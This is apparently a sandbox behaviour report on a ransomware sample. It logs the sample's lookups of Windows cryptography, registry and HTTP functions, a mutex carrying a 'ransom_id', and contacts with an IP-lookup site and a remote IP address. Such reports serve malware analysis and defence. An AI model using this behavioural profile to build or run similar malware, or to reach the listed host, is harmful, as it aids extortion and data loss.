Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x7413a980 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x74137570 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x74139e30 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x74144ff0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x76eef730 True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x76eed830 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x74139950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x74137a50 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x74144bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x74137810 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x74137600 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x7413a700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x74145100 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x74147b30 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x74138bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x74137990 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x76ef7a80 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x74133870 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x74146630 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x74147020 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x74146c50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x74162430 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x7413ab60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x74132af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x74131b90 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x7413a2b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x741378b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x74132ad0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x74133880 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x74137710 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x7413a6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x74146aa0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x76ee0e60 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x7413a740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x7413a720 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x74146ca0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x74139b00 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x741338a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x741323e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x74137620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x7413aac0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x7413a7e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x7413b0b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x74139bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x74162670 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x7413a940 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x74146730 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x741338c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x7413a120 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x74131b70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x741329d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x7413a040 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x74139bc0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x76ecf290 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x76ecf210 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x74131ba0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x7413a790 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x74138500 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x74145140 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x7413a290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x74137930 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x74138c10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x741619a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x76ec2bd0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x76ebefe0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x74137950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x76ebbb20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x74139f30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x741469b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x74146f60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x74146f70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x74146890 True 2
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x6f98c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x74146740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x741466a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x74146700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7413b040 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7413ace0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x76ed7dc0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x76ee4010 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x76ee2a50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7413a7b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x76ee2290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x76ee2910 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x76f07a60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x76efac00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x76eea890 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x7413ac80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x74160830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x767f6270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x7413fe80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x7413ff80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x74160e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x7413a750 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x74161240 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x7413ad60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x74161460 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x74139a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x7677ded0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x74133630 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x74146bb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x74146c40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x74146a50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x7413b1d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x7415d260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileAttributesW, address_out = 0x74146c20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexW, address_out = 0x741466f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x74146a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerSetConditionMask, address_out = 0x76ef1a40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x74146820 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x74145eb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x76eea200 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x74139fd0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x74140160 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerifyVersionInfoW, address_out = 0x74138c30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForMultipleObjects, address_out = 0x74146800 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x7413cd50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x74133690 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleInformation, address_out = 0x74146660 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x7413f640 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreatePipe, address_out = 0x74130540 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x74137830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7413d290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x74147b50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x74146960 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x74137970 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x741468e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x741469a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x7413ac70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x741446a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceW, address_out = 0x741469f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetWindowsDirectoryW, address_out = 0x74145120 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumeInformationW, address_out = 0x74146b60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiW, address_out = 0x74137590 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x74139b90 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7415d170 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileMappingW, address_out = 0x741399b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnmapViewOfFile, address_out = 0x74139b20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MapViewOfFile, address_out = 0x74138d60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x74146a70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x74139970 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x7413ea30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x741399f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x7413f5a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathW, address_out = 0x74146b30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x74138c80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7413b000 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x76878a60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x7686f890 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x7685d9b0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x7685abd0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x7685a740 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x768bfec0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x76874f60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x76878a80 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x768792b0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x76859580 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x76878e60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x76859860 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x76855d90 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x768562e0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x76f1aee0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x768683a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x768704a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetForegroundWindow, address_out = 0x76878cb0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowLongW, address_out = 0x76853780 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x76588830 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x76de0440 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76ddf7f0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x76ddfa20 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76ddf620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptExportKey, address_out = 0x76ddfb30 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76de0590 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetKeyParam, address_out = 0x76df6bf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76de0650 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76ddfaf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76df6b30 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenKey, address_out = 0x76de3910 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyKey, address_out = 0x76de0400 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76de1030 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76ddf330 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76ddf350 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x76ddf660 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x7527d9f0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x7528f9c0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x7527e690 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x74c6d6d0 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptBinaryToStringA, address_out = 0x74c6e0f0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x6fe8d200 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersW, address_out = 0x6fe3bec0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestW, address_out = 0x6fe86ef0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectW, address_out = 0x6fe745f0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestW, address_out = 0x6fe40fd0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x6fe88490 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x6fe47320 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumDeviceDrivers, address_out = 0x74561340 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetDeviceDriverBaseNameW, address_out = 0x745613a0 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x76f5d9b0 True 7
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenRandom, address_out = 0x76de10a0 True 1230
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CheckTokenMembership, address_out = 0x76ddfb50 True 2
Fn
Driver (253)
»
Operation Driver Additional Information Success Count Logfile
Enumerate - load_addresses = 1703688 True 2
Fn
Enumerate - load_addresses = 5832704 True 2
Fn
Get Name - load_address = 3483488256 True 2
Fn
Get Name - load_address = 3491663872 True 2
Fn
Get Name - load_address = 3467825152 True 2
Fn
Get Name - load_address = 1801781248 True 2
Fn
Get Name - load_address = 1802371072 True 2
Fn
Get Name - load_address = 1802436608 True 2
Fn
Get Name - load_address = 1802895360 True 2
Fn
Get Name - load_address = 1803091968 True 2
Fn
Get Name - load_address = 1803223040 True 2
Fn
Get Name - load_address = 1803288576 True 2
Fn
Get Name - load_address = 1803354112 True 2
Fn
Get Name - load_address = 1797259264 True 2
Fn
Get Name - load_address = 1797914624 True 2
Fn
Get Name - load_address = 1798307840 True 2
Fn
Get Name - load_address = 1798766592 True 2
Fn
Get Name - load_address = 1798963200 True 2
Fn
Get Name - load_address = 1799684096 True 2
Fn
Get Name - load_address = 1800536064 True 2
Fn
Get Name - load_address = 1800667136 True 2
Fn
Get Name - load_address = 1800863744 True 2
Fn
Get Name - load_address = 1800929280 True 2
Fn
Get Name - load_address = 1819148288 True 2
Fn
Get Name - load_address = 1819738112 True 2
Fn
Get Name - load_address = 1819803648 True 2
Fn
Get Name - load_address = 1819934720 True 2
Fn
Get Name - load_address = 1820000256 True 2
Fn
Get Name - load_address = 1820131328 True 2
Fn
Get Name - load_address = 1803550720 True 2
Fn
Get Name - load_address = 1803943936 True 2
Fn
Get Name - load_address = 1804075008 True 2
Fn
Get Name - load_address = 1804206080 True 2
Fn
Get Name - load_address = 1804337152 True 2
Fn
Get Name - load_address = 1804533760 True 2
Fn
Get Name - load_address = 1805123584 True 2
Fn
Get Name - load_address = 1805254656 True 2
Fn
Get Name - load_address = 1805647872 True 2
Fn
Get Name - load_address = 1805778944 True 2
Fn
Get Name - load_address = 1805975552 True 2
Fn
Get Name - load_address = 1806499840 True 2
Fn
Get Name - load_address = 1806630912 True 2
Fn
Get Name - load_address = 1806761984 True 2
Fn
Get Name - load_address = 1807024128 True 2
Fn
Get Name - load_address = 1809252352 True 2
Fn
Get Name - load_address = 1809317888 True 2
Fn
Get Name - load_address = 1810497536 True 2
Fn
Get Name - load_address = 1811021824 True 2
Fn
Get Name - load_address = 1811218432 True 2
Fn
Get Name - load_address = 1813708800 True 2
Fn
Get Name - load_address = 1814167552 True 2
Fn
Get Name - load_address = 1814364160 True 2
Fn
Get Name - load_address = 1815085056 True 2
Fn
Get Name - load_address = 1815543808 True 2
Fn
Get Name - load_address = 1815871488 True 2
Fn
Get Name - load_address = 1816133632 True 2
Fn
Get Name - load_address = 1816264704 True 2
Fn
Get Name - load_address = 1816788992 True 2
Fn
Get Name - load_address = 1817968640 True 2
Fn
Get Name - load_address = 1818099712 True 2
Fn
Get Name - load_address = 1818165248 True 2
Fn
Get Name - load_address = 1818230784 True 2
Fn
Get Name - load_address = 1818296320 True 2
Fn
Get Name - load_address = 1818427392 True 2
Fn
Get Name - load_address = 1832648704 True 2
Fn
Get Name - load_address = 1834680320 True 2
Fn
Get Name - load_address = 1834811392 True 2
Fn
Get Name - load_address = 1834942464 True 2
Fn
Get Name - load_address = 1824522240 True 2
Fn
Get Name - load_address = 1824718848 True 2
Fn
Get Name - load_address = 1824784384 True 2
Fn
Get Name - load_address = 1825112064 True 2
Fn
Get Name - load_address = 1825767424 True 2
Fn
Get Name - load_address = 1825898496 True 2
Fn
Get Name - load_address = 1826095104 True 2
Fn
Get Name - load_address = 1826226176 True 2
Fn
Get Name - load_address = 1826750464 True 2
Fn
Get Name - load_address = 1827340288 True 2
Fn
Get Name - load_address = 1827405824 True 2
Fn
Get Name - load_address = 1827471360 True 2
Fn
Get Name - load_address = 1827536896 True 2
Fn
Get Name - load_address = 1827602432 True 2
Fn
Get Name - load_address = 1827930112 True 2
Fn
Get Name - load_address = 1828192256 True 2
Fn
Get Name - load_address = 1828323328 True 2
Fn
Get Name - load_address = 1828388864 True 2
Fn
Get Name - load_address = 1828519936 True 2
Fn
Get Name - load_address = 1828651008 True 2
Fn
Get Name - load_address = 1829044224 True 2
Fn
Get Name - load_address = 1829240832 True 2
Fn
Get Name - load_address = 1829699584 True 2
Fn
Get Name - load_address = 1829830656 True 2
Fn
Get Name - load_address = 1830354944 True 2
Fn
Get Name - load_address = 1831403520 True 2
Fn
Get Name - load_address = 1831469056 True 2
Fn
Get Name - load_address = 1831534592 True 2
Fn
Get Name - load_address = 1831600128 True 2
Fn
Get Name - load_address = 1832124416 True 2
Fn
Get Name - load_address = 1832189952 True 2
Fn
Get Name - load_address = 1827799040 True 2
Fn
Get Name - load_address = 1830879232 True 2
Fn
Get Name - load_address = 1831010304 True 2
Fn
Get Name - load_address = 1831206912 True 2
Fn
Get Name - load_address = 1831337984 True 2
Fn
Get Name - load_address = 1818558464 True 2
Fn
Get Name - load_address = 1827864576 True 2
Fn
Get Name - load_address = 1818689536 True 2
Fn
Get Name - load_address = 1818886144 True 2
Fn
Get Name - load_address = 1816920064 True 2
Fn
Get Name - load_address = 1817247744 True 2
Fn
Get Name - load_address = 1344339968 True 2
Fn
Get Name - load_address = 1360658432 True 2
Fn
Get Name - load_address = 1346371584 True 2
Fn
Get Name - load_address = 1817378816 True 2
Fn
Get Name - load_address = 1851523072 True 2
Fn
Get Name - load_address = 1347878912 True 2
Fn
Get Name - load_address = 1347944448 True 2
Fn
Get Name - load_address = 1852178432 True 1
Fn
Get Name - load_address = 1852375040 True 1
Fn
Get Name - load_address = 1852506112 True 1
Fn
Get Name - load_address = 1852637184 True 1
Fn
Get Name - load_address = 1852768256 True 1
Fn
Get Name - load_address = 1835008000 True 1
Fn
Get Name - load_address = 1836187648 True 1
Fn
Get Name - load_address = 1836384256 True 1
Fn
Get Name - load_address = 1836908544 True 1
Fn
Get Name - load_address = 1837170688 True 1
Fn
Get Name - load_address = 1837301760 True 1
Fn
Get Name - load_address = 1837432832 True 1
Fn
Get Name - load_address = 1837760512 True 1
Fn
Get Name - load_address = 1838481408 True 1
Fn
Get Name - load_address = 1839071232 True 1
Fn
Get Name - load_address = 1839857664 True 1
Fn
Get Name - load_address = 1839988736 True 1
Fn
Get Name - load_address = 1840316416 True 1
Fn
Get Name - load_address = 1840513024 True 1
Fn
Window (249)
»
Operation Window Name Additional Information Success Count Logfile
Find vetigisoliwomo ki class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga False 249
Fn
System (14)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = X2VS1CUM True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Sleep duration = -1 (infinite) True 1
Fn
Get Time type = System Time, time = 2018-03-14 01:00:22 (UTC) True 1
Fn
Get Time type = Ticks, time = 43203 True 1
Fn
Get Time type = Ticks, time = 51656 True 1
Fn
Get Time type = Ticks, time = 78015 True 2
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 4
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=58de2295a283c81 True 1
Fn
Environment (252)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Get Environment String name = AppData, result_out = C:\Users\Nd9E1FYi\AppData\Roaming True 1
Fn
Set Environment String name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo True 249
Fn
Ini (249)
»
Operation Filename Additional Information Success Count Logfile
Read Section Win.ini section_name = hozavofoja xewuwozeyugisehatuzagito cuheleta tofexu, data_out = ˆeìv¬Nl³H False 249
Fn
Network Behavior
HTTP Sessions (3)
»
Information Value
Total Data Sent 863 bytes
Total Data Received 566 bytes
Contacted Host Count 2
Contacted Hosts ipv4bot.whatismyipaddress.com, 77.244.219.151
HTTP Session #1
»
Information Value
